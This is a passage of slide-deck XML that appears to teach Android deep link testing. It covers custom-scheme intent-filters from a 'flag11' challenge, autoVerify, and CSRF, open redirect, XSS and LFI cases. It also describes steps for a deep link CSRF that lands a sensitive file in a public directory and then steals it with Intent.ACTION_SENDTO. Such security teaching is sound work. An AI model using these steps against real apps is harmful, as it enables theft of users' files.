                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>android:scheme=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"flag11" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>android:host=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"dashboard" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>android:scheme=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"/user"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The deep link would have to match this exactly to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flag11://dashboard/user</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="242729"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Verified deep links can only use http and https schemas. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Sometimes developers keep custom schemas for testing new features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="242729"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p24"/>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What is a Deep Link?</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837200"/>
            <a:ext cx="8520600" cy="42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rPr>
              <a:t>Type of vulnerabilities are based on how the scheme://, host://, and parameters are validated</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;activity</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android:theme=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"@style/AppTheme"</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android:label=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"@string/title_activity_deep_link"</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android:name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>".DeepLinkActivity"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;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&lt;intent-filter&gt;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&lt;action</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android:name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"android.intent.action.VIEW"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;category</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android:name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"android.intent.category.DEFAULT"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;category</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android:name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"android.intent.category.BROWSABLE"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;data</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android:scheme=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"flag11"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/&gt;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&lt;/intent-filter&gt;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000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/activity&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="00008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sz="1000">
              <a:solidFill>
                <a:srgbClr val="00008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400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Test when autoVerify=”true” is not present in AndroidManifest.xml It’s easier.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Test when custom schemes do not verify endpoint parameters or hosts</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Test when endpoint parameters or host not validated, addJavaScriptInterface and setJavascriptEnabled(true); is used.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -  Test when deep link parameters aren’t validated. appschema://app/goto?file=</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p25"/>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Exploitation of Deep Links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297800" y="863550"/>
            <a:ext cx="8733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rPr>
              <a:t>Deep links take the user directly to a specific part of the Android application.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developers sometimes use deep links as a shortcut that will modify data or automatically execute an action such as downloading a file. CSRF takes place with “state changing deep links.”</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All deep links are GET requests and should be verified with autoVerify=true. Verified deep links also check Android application origin based on sha256_cert_fingerprints.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" marR="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="EC407A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>domain.name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/.well-known/assetlinks.json</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="37474F"/>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t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="37474F"/>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rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B78E7"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;intent-filter</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android:autoVerify</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"true"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B78E7"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B78E7"/>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&lt;action</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android:name</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"android.intent.action.VIEW"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B78E7"/>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&lt;category</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android:name</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"android.intent.category.DEFAULT"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B78E7"/>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&lt;category</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android:name</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"android.intent.category.BROWSABLE"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B78E7"/>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&lt;data</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android:scheme</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"https"</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android:host</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"www.example.com"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B78E7"/>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&lt;data</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android:scheme</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"https"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="9C27B0"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>android:host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="0D904F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>"mobile.example.com"</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B78E7"/>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rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="37474F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3B78E7"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F1F3F4"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;/intent-filter&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3B78E7"/>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t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="37474F"/>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t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F1F3F4"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="228600" marR="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="37474F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F1F3F4"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p26"/>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Deep Link CSRF</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9631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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find a deeplink that automates an action without a user prompt, chances are the user has already granted permissions for all application actions.</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For example a deep link that automatically downloads a sensitive file to a public directory guarantees a malware application can steal that file.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Java </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request deeplink.</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr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Then steal file with Intent.ACTION_SENDTO and Intent.EXTRA_STREAM from public directory for proof of concept.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
